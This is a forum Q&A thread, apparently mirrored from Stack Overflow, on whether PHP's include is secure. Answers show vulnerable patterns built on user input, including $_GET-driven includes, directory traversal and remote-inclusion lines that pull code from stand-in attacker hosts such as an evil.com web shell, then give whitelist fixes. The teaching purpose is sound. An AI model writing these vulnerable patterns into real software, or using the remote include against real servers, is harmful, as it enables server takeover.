发表新帖
发表新帖

PHP - Is “include” function secure?

前端 未结
关注
8 827
傲寒
傲寒 2020-12-06 06:28

I\'m using the \"include\" function (e.x. \"include \'header2.php\'\" or \"include \'class.users.php\'\") to add the header or session class in my website. I don\'t really r

相关标签:
8条回答
  • 忘了有多久
    2020-12-06 07:09

    Anything server side (assuming your server isn't compromised) is safe. Doing this:

    $var = $_GET['var']';    
include $var . ".php";

    is insecure.

    include "page.php";

    is secure.

    0 讨论(0)
  • 闹比i
    2020-12-06 07:10

    I'm using this method.

    <?php include (dirname(__FILE__).'/file.php');
    0 讨论(0)
  • 粉色の甜心
    2020-12-06 07:14

    No! An include() is NOT secure. Without considering a single line of code, consider this: include() still allows your script to chug along even if a file fails to load. It will continue to run with a warning. SO, this widens the attack vector of your php script for the clever malicious user.

    Within a modern application design, why would the inclusion of a file ever need to be optional? If your application is not whole, you want it to fail!

    0 讨论(0)
  • 日久生厌
    2020-12-06 07:24

    The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

    if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }
    0 讨论(0)
  • 北海茫月
    2020-12-06 07:26

    Include can be abused if you do something like this:

    include($_GET["page"]);

    and then call the URL:

    myscript.php?page=index.php

    attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.

    include itself is perfectly safe. Just make sure to always validate/escape your input.

    0 讨论(0)
  • 感情败类
    2020-12-06 07:28

    It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    <?php 
include($_GET['file']);
?>

    Insecure (URL fopen - If enabled)

    <?php 
include('http://evil.com/c99shell.php');
?>

    Insecure

    <?php 
include('./some_dir/' . $_GET['file']);
?>

    Partially Insecure ( *.php files are vulnerable )

    <?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

    Secure (Though not sure why anyone would do this.)

    <?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

    Secure

    <?php 
include('./includes/somefile.php');
?>
    0 讨论(0)
 看不清?
提交回复
热议问题